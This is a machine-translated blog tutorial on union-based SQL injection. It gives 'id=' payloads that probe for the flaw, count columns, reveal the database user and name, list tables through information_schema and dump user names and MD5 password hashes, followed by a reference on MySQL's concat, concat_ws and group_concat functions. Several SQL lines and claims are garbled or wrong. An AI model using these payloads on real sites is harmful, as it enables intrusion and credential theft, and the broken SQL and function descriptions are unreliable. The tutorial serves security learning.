Zhangxiaobai's road of penetration (VI) -- the idea and process of SQL injection and the concat series functions and information of SQL_ Schema database explanation

Preface

About SQL The content of injection theory , Xiaobai's previous blog has written , If you are interested, you can go and have a look ~SQL Detailed explanation of injection principle

practice

stay SQL Injected into the test interface url Input

？id=1

Results page unchanged , It indicates that there may be injection points

Let's continue with this example to further understand SQL Injected ideas .
For example, what I want to get now is the password of a user in the database , So what should we do ？
1. View web page source code analysis
There is no nonsense in this principle , The purpose of analysis is to check whether there are injection vulnerabilities .
2. We inject code in a testable way ,（ Note here ,？ Don't type it in Chinese ）

？id=1' and 1=1--+

?id=1' and 1=2--+

Look at the two pictures above ： First, we add a... At the beginning of the input ’ Play the role of closing code . Then we add a judgment statement and 1=1 perhaps 1=2, If the former can be accessed normally , The latter access is abnormal （ because and 1=2 Hang on , So you can't access the right web page ）, Then we can be sure , There is an injection vulnerability .

3. After verifying that the vulnerability does exist , Because of the digital injection found now （id=x）, So we went through order by Clause （ Arrange data from small to large in a column , If it is a letter, it is abcd……） To test how many rows of data there are .
4. Let's assume that there is 4 Row data （ This guess is completely random ）

Found an error ： No field found in Clause 4
5. So let's try again

Found that the visit was normal , Then we can be sure , Now? ID This item has 3 It's worth .

6. Now that we have found that there are 3 It's worth , Then we try to obtain some sensitive information through joint query .

?id=1 'and 1=2 union select 1,user(),database()--+

Using this command, we can reveal the server MYSQL Current user name , Current database name , You can use the database name to further obtain the table name .（ because UNION The column name in the result set always equals UNION First of all SELECT Column names in statements . therefore Union For the previous query, we use 1=2 Cancel it ）

7. Now we know the database name , The next step must be to get the table name of the database .
We try to enter the code

？id=1 'and 1=2 union select 1,2,group_concat(tables_name) from information_schema.tables where table_schema=database()--+

Two table names were found
8. Next we'll use information_schema Database query column name .
Inject code

?id=1 'and 1=2 union select 1,group_concat(name),group_concat(pass) from users --+

Finally we got the data we needed , The following line of code is the password we want , yes MD5 After encryption

Function usage worth mentioning ：
CONCAT() function
concat() Function is used to connect multiple strings into one string .
Here is a table named info Table of

a. Grammar and usage characteristics
concat(str1,str2,……)
The return result is the string generated by the connection parameter . If any of the parameters is NULL, The return value is NULL, You can have one or more parameters .

b. Examples of use

select concat('id',',','name') as zhang from info limit 1;

The return result is ( Notice the... In the returned result , It is also a concatenated string )

select concat(‘id’,‘zhang’,name); The return result is

CONCAT_WS() function
When we want to specify the separator between parameters , We can use concat_ws() Parameters
a. Grammar and usage characteristics
concat_ws(separator,str1,str2,……)
concat_ws namely concat with separator, That is, with a separator concat
The delimiter can be a string or other parameters , If the separator is null, The result must be null. The function ignores any delimiter arguments that follow null value , however concat_ws() No empty strings will be ignored .（ However, we will ignore all of them null）

b. Examples of use

select concat_ws('~',id,name) as zhang from info limit 1;

Return results

select concat_ws(’~’,‘id’,‘null’,‘name’);
Return results

GROUP_CONCAT() function
group_concat Function returns a string result , The result is a combination of values in the group .
For example, one info The data in the table are as follows :

select name,id,job from info where name in ('lit','bai');

a. Grammar and its characteristics

group_concat([distinct]expr[,expr…]
[order by {unsigned_integer | col_name | formula}[asc | desc] [,col…]]
[spearator str_val])

stay mysql in , You can get the join value of the expression combo .
By using distinct You can exclude duplicate values . If you want to sort the values in the results , have access to oder by Clause .
separator Is the value of a string , It is used to insert into the result value , The default is a comma , By using separator“” Remove this value completely

b. Examples of use

select name ,group_concat(id) from info where name in('lit','bai') group by name

select name,group_concat(distinct id oder by id desc separator'~') from info where name in ('lit','bai') group by name

select name,group_concat(concat_ws(',','id','job') order by id desc separator'.')from info where name in ('lit','bai') group by name;

group by() Function and order by() function
group by Sort from large to small
order by() Sort from small to large
order by() desc From university to university

Database usage worth mentioning
information_schema It can be understood as the summary of all databases of the division ,
For example, I want to
Query all databases
select * from information_schema;
Inquire about litbai All table names in the library
select groupconcat(table_name) from information_schema.tables where table_schema=‘litbai’;